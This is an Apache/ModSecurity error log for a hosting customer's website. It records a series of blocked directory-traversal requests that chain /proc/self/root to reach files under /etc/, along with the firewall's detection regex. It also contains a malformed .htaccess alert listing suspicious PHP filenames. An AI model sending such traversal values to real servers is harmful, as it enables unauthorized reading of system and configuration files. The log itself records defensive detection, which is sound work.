[Tue Mar 17 21:51:44.091740 2026] [:error] [pid 17653:tid 140411607643904] [client 74.7.241.31:47000] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3IMdf6f5d65gmYZRq0gAAAtA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:51:45.553409 2026] [:error] [pid 25836:tid 140411582465792] [client 74.7.241.31:47012] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3IYh-PF_25v4hFRCXGAAAARM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:51:59.111354 2026] [proxy_fcgi:error] [pid 17653:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:41112] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:52:00.194499 2026] [:error] [pid 25836:tid 140411683178240] [client 74.7.241.31:47012] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3MIh-PF_25v4hFRCXIAAAAQc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:52:02.623637 2026] [:error] [pid 2598:tid 140411590858496] [client 74.7.241.31:50154] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3Mhj0p0SRWAqcjGGlzAAAAxI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:52:04.271850 2026] [:error] [pid 17972:tid 140411641214720] [client 74.7.241.31:50170] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3NIZ5-GlpYjVrXCrhbQAAAkw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:52:05.809049 2026] [:error] [pid 17972:tid 140411590858496] [client 74.7.241.31:50180] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3NYZ5-GlpYjVrXCrhcgAAAlI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:52:08.002461 2026] [:error] [pid 11816:tid 140411599251200] [client 74.7.241.31:58180] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3OOw_le52K8_3pV14ogAAAhE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:52:21.142264 2026] [proxy_fcgi:error] [pid 25836:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:41654] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:52:23.363555 2026] [:error] [pid 31803:tid 140411565680384] [client 74.7.241.31:39022] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3R-yqAr6etmhZHNpTAAAAAFU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:52:25.661381 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.241.31:39030] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3Sda6ubjKNq_cu4YylwAAA04"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:52:26.197818 2026] [core:alert] [pid 17972:tid 140411574073088] [client 74.7.243.128:58032] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </IfModule>custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|txets.php)$'> without matching <IfModule>custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|txets.php)$'> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/usr/libexec
[Tue Mar 17 21:52:27.161674 2026] [:error] [pid 25836:tid 140411599251200] [client 74.7.241.31:39036] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3S4h-PF_25v4hFRCXLAAAARE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:52:29.363943 2026] [:error] [pid 31803:tid 140411699963648] [client 74.7.241.31:36264] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3TeyqAr6etmhZHNpTBAAAAEU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:52:43.149779 2026] [proxy_fcgi:error] [pid 17887:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:42130] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:52:46.344360 2026] [:error] [pid 31803:tid 140411683178240] [client 74.7.241.31:48830] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3XOyqAr6etmhZHNpTEgAAAEc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:52:47.971936 2026] [:error] [pid 25836:tid 140411607643904] [client 74.7.241.31:42152] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3X4h-PF_25v4hFRCXPgAAARA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:52:49.552135 2026] [:error] [pid 17972:tid 140411582465792] [client 74.7.241.31:42156] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3YYZ5-GlpYjVrXCrhigAAAlM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:52:51.138023 2026] [:error] [pid 18211:tid 140411725141760] [client 74.7.241.31:42162] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3YxcIZFNFgEhGGCRDZgAAA8I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:53:02.211738 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.241.31:47126] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3bta6ubjKNq_cu4YyrAAAA1E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:53:04.129802 2026] [proxy_fcgi:error] [pid 17887:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:42426] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:53:04.818017 2026] [:error] [pid 19507:tid 140411624429312] [client 74.7.241.31:47130] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3cNY0UrI5A3LftIwrmQAAAY4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:53:06.471533 2026] [:error] [pid 17653:tid 140411590858496] [client 74.7.241.31:47132] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3csdf6f5d65gmYZRq_wAAAtI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:53:08.055157 2026] [:error] [pid 17653:tid 140411666392832] [client 74.7.241.31:53190] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3dMdf6f5d65gmYZRrBAAAAsk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:53:10.435406 2026] [:error] [pid 11816:tid 140411616036608] [client 74.7.241.31:53202] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3duw_le52K8_3pV14uwAAAg8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:53:11.952271 2026] [:error] [pid 17653:tid 140411590858496] [client 74.7.241.31:53216] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3d8df6f5d65gmYZRrCwAAAtI"], referer: 